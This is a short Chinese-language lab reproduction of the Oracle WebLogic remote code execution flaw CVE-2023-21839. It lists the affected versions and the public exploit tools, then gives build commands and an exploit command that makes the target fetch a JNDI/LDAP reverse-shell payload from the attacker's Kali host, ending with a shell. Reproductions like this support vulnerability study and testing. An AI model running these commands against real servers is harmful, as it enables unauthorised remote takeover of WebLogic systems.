漏洞简介
Oracle发布安全公告,修复了一个存在于WebLogic Core中的远程代码执行漏洞(CVE-2023-21839),可在未经身份验证的情况下通过T3、IIOP协议远程访问并破坏易受攻击的WebLogic Server,成功利用该漏洞可能导致未授权访问和敏感信息泄露。
影响版本
Oracle Weblogic Server 12.2.1.3.0
Oracle Weblogic Server 12.2.1.4.0
Oracle Weblogic Server 14.1.1.0.0
漏洞复现
复现环境:vulhub/weblogic/CVE-2023-21839
复现用到的两个工具:
JNDIExploit-1.2-SNAPSHOT.jar:https://github.com/Mr-xn/JNDIExploit-1/releases/tag/v1.2
CVE-2023-21839:https://github.com/4ra1n/CVE-2023-21839
1、在kali上开启LDAP服务监听
2、在kali上使用nc开启监听端口
3、使用CVE-2023-21839工具来进行攻击测试(将工具上传至kali进行编译,然后再执行)
cd cmd
go build -o CVE-2023-21839
./CVE-2023-21839 -ip 192.168.80.131 -port 7001 -ldap ldap://192.168.80.128:1389/Basic/ReverseShell/192.168.80.128/5555
成功获取到反弹shell。